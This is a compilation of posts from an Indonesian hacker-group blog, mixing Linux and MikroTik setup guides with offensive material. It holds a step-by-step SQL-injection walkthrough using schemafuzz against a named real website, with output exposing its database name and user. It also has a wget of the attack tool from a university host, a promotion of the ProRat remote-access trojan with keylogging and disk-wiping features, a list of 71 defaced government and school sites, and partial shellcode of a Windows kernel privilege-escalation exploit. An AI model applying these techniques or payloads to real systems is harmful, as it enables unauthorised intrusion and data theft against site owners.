Rilis Final Red Hat Enterprise Linux 6 - RHEL 6

http://bojalinuxer.blogspot.com

RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia, dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat perbaikan-perbaikan dan itu tersedia untuk arsitektur i386, AMD64/Intel64, System z, dan IBM Power (64-bit).

Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5 tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan mendapat dukungan.

"Red Hat Enterprise Linux selama bertahun-tahun menjadi platform mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti British Airways, Citi dan NTT Communications telah menjadi mitra terpercaya dalam pengembangan platform Red Hat Enterprise Linux."

"Kami sekarang memasuki era enterprise computing di mana fleksibilitas, portabilitas dan interoperabilitas yang lebih penting daripada sebelumnya. Dan hari ini, kami memberikan platform yang dibutuhkan konsumen. Ini selalu menjadi fokus kami".

"Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini adalah platform yang dirancang untuk menghantar pelanggan ke generasi berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier, executive vice president and president, Products and Technologies di Red Hat, pada press release.

http://bojalinuxer.blogspot.com

Yang baru dengan Red Hat Enterprise Linux 6:

  • Peningkatan grafis installer;
  • Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);
  • LVM enhancements;
  • Power management yang lebih baik dengan powertop dan tuned;
  • Peningkatan PackageKit dan Yum package managers;
  • Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;
  • Peningkatan keamanan;
  • Pelabelan Network packet dan dukungan untuk IPv6;
  • Fungsionalitas Suspend dan resume;
  • Dukungan untuk multiple display;
  • Driver video Nouveau untuk kartu grafis Nvidia;
  • Dukunga Internasionalisasi;
  • KDE SC 4.3;
  • OpenOffice.org Office Suite 3.1;
  • Mozilla Thunderbird 3;
  • Mozilla Firefox 3.5;
  • Apache 2.2.15;
  • MySQL 5.1;
  • PostgreSQL 8.4;
  • Dokumentasi yang lebih baik;
  • Peningkatan dukungan C++;
  • Peningkatan Samba;
  • Dukungan penuh untuk KVM (Kernel-based Virtual Machine);
  • Dukungan Alternative PHP Cache (APC) untuk PHP;
  • Penambahan memcached.

Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis. Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS (workstation) dan Red Hat Desktop.

Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.

Red Hat Enterprise Linux 5.5 (Registration Required)
[iso] [0 KB]

Red Hat Enterprise Linux 6 Beta 2 (ISO) i386
[iso] [3.40 GB]

Red Hat Enterprise Linux 6 Beta 2 (ISO) x86_64
[iso] [3.90 GB]

Situs IPB Mudah Dijebol Hacker

Screenshot web page situs IPB yang di-hack
JAKARTA - Seorang hacker mengaku bisa menjebol pertahanan di situs resmi Institut Pertanian Bogor (IPB).
Dalam aksinya, sang hacker mengaku tidak berniat untuk mengacak-acak situs tersebut. Hanya saja mereka ingin mengungkapkan jika keamanan jaringan sebuah situs sangatlah penting. Apalagi saat ini diduga telah terjadi perang cyber antara hacker Indonesia dengan Malaysia.

"Ada beberapa backdoor yang tertanam di situs ipb.ac.id. Itu tugas admin untuk membersihkan dan mem-patch celah yang berpotensi disusupi hacker," tulis sang hacker dalam pesannya, Jumat (31/12/2010).

Memang sang hacker tidak mengacak-acak situs secara keseluruhan. Buktinya konten-konten dalam situs IPB masih bisa diakses. Hanya saja sang hacker bisa menerobos keamanan situs dan menambahkan konten baru ke dalam situs tersebut.

Bahkan dalam satu halaman yang dibuat hacker sebagai bukti kemampuannya, yaitu dalam halaman webometrics.ipb.ac.id, dirinya menyematkan sebuah foto yang menggambarkan nasionalisme anak Indonesia.
Note: sampai saat ini defacing page masih ada, silahkan di cek di
http://webometrics.ipb.ac.id/cms/

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

DVWA Web Hacking

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

DVWA include some web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download DVWA

Remote Administrator with ProRat

Prorat is one of RAT (Remote Administration Tools) are widely used to take over the computer system. Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network. Use of Prorat quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port. The hardest part is finding where an open port. But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..


Here are the features provided by PRORAT:

- Remote Control
- Viewing System Info, application running and the Task Manager
- Add process, file, or download files
- Admin FTP
- Format the HDD (hard disk damage)
- Remotely download
- Running MS-DOS, Batch Script, VBScript
- Adding a Registry Entry
- Keylogger: Password Recording
- Make Screnshoot, see your Windows desktop instantly
- Send messages and chat
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

Download Prorat
or Download Prorat at here

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS™ merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

SQL Injection With Schemafuzz

SQL Injection With Schemafuzz
=========================================================
Welcome to my tutorial by arianom KiLL-9 CrEw
Powered by kill-9.tk
==================================================================
[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.
Schemafuzz ini dijalankan menggunakan python.
1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux
2. wget schemafuzz.py : wget http://undana.ac.id/images/upload/schemafuzz.py
3. mv schemafuzz.py f >> untuk memperpendek cmd
4. python f -h >> mengetahui option cmd

> ketik python f -h
Usage: python f [options] arianom[@]gmail[dot]com kill-9.tk
Modes:
Define: --findcol Finds Columns length of a SQLi MySQL v4+
Define: --info Gets MySQL server configuration only. MySQL v4+
Define: --dbs Shows all databases user has access too. MySQL v5+
Define: --schema Enumerate Information_schema Database. MySQL v5+
Define: --full Enumerates all databases information_schema table MySQL v5+
Define: --dump Extract information from a Database, Table and Column. MySQL v4+
Define: --fuzz Fuzz Tables and Columns. MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump mode.

1. python f --findcol -u "www.site.com/news.php?id=22"
2. python f --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
3. python f --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
4. python f --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db
5. python f --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D c_db -T user -C name,pass
6. python f --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt


[x] Penetrasi ke target. oke, kita cari target........
target di dapat : http://akperpasuruan.com/index.php?list=berita&de=14

1. langkah pertama --findcol [mencari panjang kolom]

[root@su110 tmp]# python f --findcol -u "http://akperpasuruan.com/index.php?list=berita&de=14"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14--
[+] Evasion Used: "+" "--"
[+] 16:55:12
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!

2. langkah ke dua --info [melihat database]

[root@su110 tmp]# python f --info -u "http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3"

|---------------------------------------------------------------|
| arianom[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: python f [options] |
| -h help kill-9.tk |
|---------------------------------------------------------------|

[+] URL: http://akperpasuruan.com/index.php?list=berita&de=14+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 16:56:57
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: akperpas_db
User: akperpas_bagus@localhost
Version: 5.0.91-community

[+] Do we have Access to MySQL Database: No
[+] Do we have Access to Load_File: No

[-] 16:57:23
[-] Total URL Requests 3
[-] Done

Selengkapnya bisa di download disini
Request mas jhony utk tutorial schemafuzz

[x] Greats:
All KiLL-9 CrEw and IndonesianCoder Team, DarkCode, MC-CrEW , Magelang-Cyber CrEw, KPLI Kediri, JatimCom, and All Indonesian Hacker and You

Patch SQL Injection

SQL Injection adalah salah satu teknik penyerangan ke sebuah web dengan cara memasukkan perintah sql ke url target sehingga attacker bisa memperoleh informasi penting dari website tersebut. Seperti nama user, password, email, dan masih banyak lagi informasi yg bisa didapatkan tergantung kreativitas attacker. Langsung saja kita coba scan bug dengan memasukkan sigle quote di akhir url, misalkan :

http://site.com/index.php?list=berita&de=14

Kalau ada error, bisa dianggap positif vuln terhadap sqli. Lihat gambar dibawah:

Seperti yang kita ketahui bugnya ada di http://site.com/index.php?list=berita&de=14 , lebih tepatnya yg menyebabkan ini semua terjadi adalah file berita.php dan string de, sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake editplus. Ini isi dari sebagian filenya :


Bugnya ada di script bagian ini :

$iddetail = $_GET['de'];

Tidak adanya filter di $_GET[‘de’] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

Lalu ganti script $iddetail = $_GET['de']; menjadi $iddetail = $de; Untuk script lengkapnya bias di download disini. Sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra.. proses patching telah berhasil.

Greats :

All Kill-9 Crew and IndonesianCoder Team, Malang-Cyber Crew and All Indonesian Hacker and You

Hexjector

Hexjector is an Opensource,Cross Platform PHP script to automate Site Pentest for SQL Injection Vulnerabilties.
Features:
1.Check for SQL Injection Vulnerablities.
2.Pentest SQL Injection Vulnerablities.
3.Web Application Firewall Detector.
4.Scan For Admin Page

5.Manual Dump Function
6.Browser
7.SQL Injection Type Detection
8.Search For Vulnerable Sites by using Google Dork
9.MD5 Cracker

Download

Armitage

Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

For discovery, Armitage exposes several of Metasploit’s host management features. You can import hosts and launch scans to populate a database of targets. Armitage also visualizes the database of targets–you’ll always know which hosts you’re working with and where you have sessions.

Armitage assists with remote exploitation–providing features to automatically recommend exploits and even run active checks so you know which exploits will work. If these options fail, you can use the Hail Mary approach and unleash db_autopwn against your target database.

Requirements
To use Armitage, you need the following:
Linux or Windows
Java 1.6+
Metasploit Framework 3.5+
A configured database. Make sure you know the username, password, and host.

Download [Win]
Download [LiN/niX]

Source

DotDotPwn

It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module.
It's written in perl programming language and can be run either under *NIX or Windows platforms. Fuzzing modules supported in this version:

Blackbuntu

Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security.

Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track. It's created as a hobby.

Medusa

Medusa Parallel Network Login Auditor
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:
Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Ostinato

Ostinato Live converts any PC to a dedicated network packet traffic generator. It runs the open source cross platform packet traffic generator – Ostinato.
Ostinato is a network packet and traffic generator and analyzer with a friendly GUI. It aims to be “Wireshark in Reverse” and thus become complementary to Wireshark. It features custom packet crafting with editing of any field for several protocols: Ethernet, 802.3, LLC SNAP, VLAN (with Q-in-Q), ARP, IPv4, IPv6, IP-in-IP a.k.a IP Tunneling, TCP, UDP, ICMP,HTTP, SIP, RTSP, NNTP, etc. It is useful for both functional and performance testing.

71 Website Indonesia dikerjai 'Hacker'



KOMPAS.com - Menjelang peringatan kemerdekaan ke-65 Republik Indonesia, hacker atau peretas dari Indonesia justru bikin ulah di puluhan situs yang mayoritas milik lembaga resmi di Indonesia. Mereka meninggalkan pesan begini, "DIRGAHAYU INDONESIA TANAH AIR PUSAKA JAYALAH BANGSAKU, JAYALAH NEGERIKU..MERDEKA!!"

Aksi itu dimotori peretas yang menyebut diri Aria Killnine a.k.a arianom, pendiri komunitas KiLL-9 CrEw dengan situsnya di Www.KiLL-9.Tk.

Daftar situs yang diretas terlihat di bawah nanti. Tetapi, mengapa pula justru menyerang situs milik anak bangsa sendiri?
Kompasianer Rakhjib Martapianur memberitahu, "Mereka tidak melakukan perusakan terhadap site-site tersebut. Mereka hanya menitipkan file, sekaligus mengingatkan para admin site tersebut bahwa site yang mereka kelola rentan terhadap serangan oleh hacker-hacker luar Indonesia."

Rakhjib Martapianur mengakui, informasi itu diketahuinya dari temannya yang bergelut di dunia hacking. Dan, inilah daftar situs yang dititipi pesan-pesan dari peretas itu:

1. http://semestaberjaya.com/indonesiaku.php
2. http://fs.uns.ac.id/indonesia.php
3. http://unj.ac.id/indonesia.php
4. http://www.unand.ac.id/foto/indonesia.htm
5. http://el82itb.org/indonesia.htm
6. http://unhalu.ac.id/staff/indonesia.htm
7. http://www.adhiguna.ac.id/indonesia.htm
8. http://www.stikes-insan-seagung.ac.id/indonesia.htm
9. http://www.himsya.ac.id/indonesia.htm
10. http://www.poltekpos.ac.id/indonesia.htm
11. http://informatika.uin-malang.ac.id/COPYRIGHT.php
12. http://www.mar-eng.its.ac.id/ina/akademik/admin/foto_berita/indonesia.htm
13. http://kaltimprov.go.id/indonesia.php
14. http://pengadilan.net/indonesia.php
15. http://bkp.deptan.go.id/indonesia.htm
16. http://kemenegpora.go.id/merdeka.html
17. http://sifa.kemenegpora.go.id/merdeka.html
18. http://www.lsf.go.id/merdeka.html
19. http://pekalongankota.go.id/merdeka.html
20. http://bpphp1.dephut.go.id/merdeka.html
21. http://bpphp2.dephut.go.id/merdeka.html
22. http://bpphp3.dephut.go.id/merdeka.html
23. http://bpphp4.dephut.go.id/merdeka.html
24. http://bpphp5.dephut.go.id/merdeka.html
25. http://bpphp6.dephut.go.id/merdeka.html
26. http://bpphp8.dephut.go.id/merdeka.html
27. http://bpphp9.dephut.go.id/merdeka.html
28. http://bpphp10.dephut.go.id/merdeka.html
29. http://manmajenang.sch.id/files/indonesia.php
30. http://spma-samarinda.sch.id/indonesia.htm
31. http://smkn1kalasan.sch.id/merdeka.html
32. http://smkn1madiun.sch.id/merdeka.html
33. http://robbirodliyya.sch.id/merdeka.html
34. http://smkypesampang.sch.id/merdeka.html
35. http://www.smpn3kpj.sch.id/merdeka.html
36. http://www.majesa.sch.id/merdeka.html
37. http://smkypkpwk.sch.id/merdeka.html
38. http://smpn5cirebon.sch.id/merdeka.html
39. http://smpn2balen.sch.id/merdeka.html
40. http://smpn1oku.sch.id/merdeka.html
41. http://smkn6palembang.sch.id/merdeka.html
42. http://smpn4gm.sch.id/merdeka.html
43. http://smpn5lht.sch.id/merdeka.html
44. http://manhokut.sch.id/merdeka.html
45. http://mtsdarussalampkp.sch.id/merdeka.html
46. http://smkn1barru.sch.id/merdeka.html
47. http://sman3bantul.sch.id/merdeka.html
48. http://sman1cepu.sch.id/merdeka.html
49. http://smpn1piyungan-btl.sch.id/merdeka.html
50. http://www.smansa-mjl.sch.id/merdeka.html
51. http://smp1pra-bws.sch.id/merdeka.html
52. http://smpn13bdg.sch.id/merdeka.html
53. http://smpn1panumbangan.sch.id/merdeka.html
54. http://smpmuh-ckn.sch.id/merdeka.html
55. http://smkkpbe-bdg.sch.id/merdeka.html
56. http://sditalamysubang.sch.id/merdeka.html
57. http://sdnbjs2bdg.sch.id/merdeka.html
58. http://www.smaplusbanyuasin.sch.id/merdeka.html
59. http://www.smkn1samarinda.com/merdeka.html
60. http://akademik.sma-alirsyad-clp.sch.id/merdeka.html
61. http://sma-alirsyad-clp.sch.id/merdeka.html
62. http://www.majesa.sch.id/merdeka.html
63. http://www.bellarminus-bks.sch.id/merdeka.html
64. http://sman2-wng.sch.id/merdeka.html
65. http://www.sma1pekalongan.sch.id/merdeka.html
66. http://kimomibutik.com/admin/foto_berita/indonesia.htm
67. http://www.smart-v-indonesia.com/indonesia.php
68. http://kabar-kini.com/indonesia.htm
69. http://semestaberjaya.com/indonesia.php
70. http://tikjo.my-php.net/indonesia.php
71. http://www.pusatk3hiperkes.com/indonesia.htm

Install Mikrotik Sebagai Gateway

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.

1. Langkah pertama adalah install Mikrotik RouterOS pada PC


2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)

Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin
dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.

3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]] >

4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “killnine” (nama ini bebas terserah kalau mau diganti)
[admin@Mikrotik] > system identity set name=killnine
[admin@killnine] >

5. Melihat interface pada Mikrotik Router
[admin@killnine] > interface print
Flags: X – disabled, D – dynamic, R – running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@killnine] >

6. Memberikan IP address pada interface Mikrotik. Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 192.168.0.254

[admin@killnine] > ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@killnine] > ip address add address=192.168.0.254
netmask=255.255.255.0 interface=ether2

7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@killnine] >ip address print
Flags: X – disabled, I – invalid, D – dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 192.168.0.254/24 192.168.0.0 192.168.0.255 ether2
[admin@killnine] >

8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.1.1
[admin@killnine] > /ip route add gateway=192.168.1.1


9. Melihat Tabel routing pada Mikrotik Routers
[admin@killnine] > ip route print
Flags: X – disabled, A – active, D – dynamic,
C – connect, S – static, r – rip, b – bgp, o – ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 192.168.0.0/24 192.168.0.254 ether2
1 ADC 192.168.0.0/24 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.1.1 ether1
[admin@killnine] >

10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@killnine] > ping 192.168.1.1
192.168.1.1 64 byte ping: ttl=64 time<1>
192.168.1.1 64 byte ping: ttl=64 time<1>
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0/0.0/0 ms
[admin@killnine] >

11. Setup DNS pada Mikrotik Routers
[admin@killnine] > ip dns set primary-dns=202.134.0.155 allow-remoterequests=no
[admin@killnine] > ip dns set secondary-dns=202.134.1.10 allow-remoterequests=no

12. Melihat konfigurasi DNS
[admin@killnine] > ip dns print
primary-dns: 202.134.0.155
secondary-dns: 202.134.1.10
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@killnine] >

13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@killnine] > ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@killnine] >

Jika sudah berhasil reply berarti seting DNS sudah benar.

14. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.
[admin@killnine]> ip firewall nat add action=masquerade outinterface=
ether1 chain:srcnat
[admin@killnine] >

15. Melihat konfigurasi Masquerading
[admin@killnine]>ip firewall nat print
Flags: X – disabled, I – invalid, D – dynamic
0 chain=srcnat out-interface=ether1 action=masquerade
[admin@XAVIERO] >

Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server.

DriveCrypt 5.3 Local Kernel ring

/* drivecrypt-dcr.c
*
* Copyright (c) 2009 by
*
* DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit
* by mu-b - Sun 16 Aug 2009
*
* - Tested on: DCR.sys
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/

#include
#include

#include
#include

#define DCR_IOCTL 0x00073800

static unsigned char win32_fixup[] =
"\x89\xe5"
"\x81\xc5\xb4\x0c\x00\x00";

/* Win2k3 SP1/2 - kernel EPROCESS token switcher
* by mu-b
*/
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"\xb8\x24\xf1\xdf\xff"
"\x8b\x00"
"\x8b\xb0\x18\x02\x00\x00"
"\x89\xf0"
/* _sys_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x04\x00\x00\x00"
"\x74\x11"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
"\xeb\x21"
/* _sys_eprocess_found */
"\x89\xc1"
"\x89\xf0"

/* _cmd_eprocess_loop */
"\x8b\x98\x94\x00\x00\x00"
"\x81\xfb\x00\x00\x00\x00"
"\x74\x10"
"\x8b\x80\x9c\x00\x00\x00"
"\x2d\x98\x00\x00\x00"
"\x39\xf0"
"\x75\xe3"
/* _not_found */
"\xcc"
/* _cmd_eprocess_found
* _ring0_end */

Download Full
 
KiLL-9 CrEW Copyright © 2009 KiLL-9 CrEw Template Designed by Arianom Founder KilLL-9 CrEw Best Indonesian White Hacker. Allright Reserved.